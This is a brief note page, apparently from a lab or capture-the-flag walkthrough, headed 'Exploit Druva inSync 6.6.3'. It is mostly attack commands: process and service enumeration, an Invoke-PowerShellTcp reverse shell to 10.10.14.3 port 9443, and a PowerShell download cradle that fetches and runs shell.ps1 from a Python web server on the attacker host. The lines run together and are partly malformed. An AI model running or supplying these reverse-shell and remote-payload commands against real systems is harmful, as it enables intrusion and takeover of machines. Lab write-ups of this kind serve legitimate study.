druva-insync
Exploit Druva inSync 6.6.3
netstat -ano | findstr 6064Get-process -Id 3324get-service | ? {$_.DisplayName -like 'Druva*}Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443 OR$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3:8080/shell.ps1')"python3 -m http.server 8080Last updated